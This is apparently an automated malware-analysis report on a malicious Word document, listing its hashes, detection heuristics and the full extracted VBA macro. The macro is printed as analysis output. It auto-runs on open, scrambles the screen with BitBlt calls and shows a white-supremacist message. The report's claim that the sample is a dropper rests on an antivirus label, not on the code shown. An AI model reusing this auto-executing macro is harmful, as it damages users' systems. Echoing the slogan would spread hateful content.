Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8002769381c5f2cc…

MALICIOUS

Office (OLE)

41.0 KB Created: 2004-07-29 09:09:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 3d011c37189d9e67a481a8e4a4893138 SHA-1: f7269eb4f3a188938ae9b5a4c7da7cc3408dc49c SHA-256: 8002769381c5f2cccf1af31dcc59128137f2f441f6f9e19a14ac2047bb39a35e
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro with an AutoOpen subroutine, which is a common technique for malicious documents. The macro attempts to perform graphical operations using BitBlt and GetDC, and displays a message box with the text 'Feel the white power...'. This behavior, combined with the ClamAV detection 'Doc.Dropper.Agent-5909269-0', strongly suggests it's a dropper or downloader.

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-5909269-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5909269-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1113 bytes
SHA-256: c480b888677299dc95edf0807823289fc6d85f154737ab2befaaf7020a76e490
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Zelda"
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal XSrc As Long, ByVal YSrc As Long, ByVal dwRop As Long) As Long

Sub AutoOpen()
On Error Resume Next
Application.WindowState = wdWindowStateMinimize
Randomize
For graf = 1 To 110000
Randomize
c = GetDC(0)
x = Int(Rnd * 600) + 1
Y = Int(Rnd * 800) + 1
X1 = x + 1
Y1 = Y + 1
c = BitBlt(c, Y1, X1, 6, 6, c, Y, x, -3)
Next graf
MsgBox "Feel the white power...", vbInformation, "Win32/VBS.Angeldust"
End Sub
Sub helpabout()
On Error Resume Next
Randomize
dc = GetDC(0)
Blt = BitBlt(dc, 0, 0, 1024, 768, dc, 0, 0, &H550009)
End Sub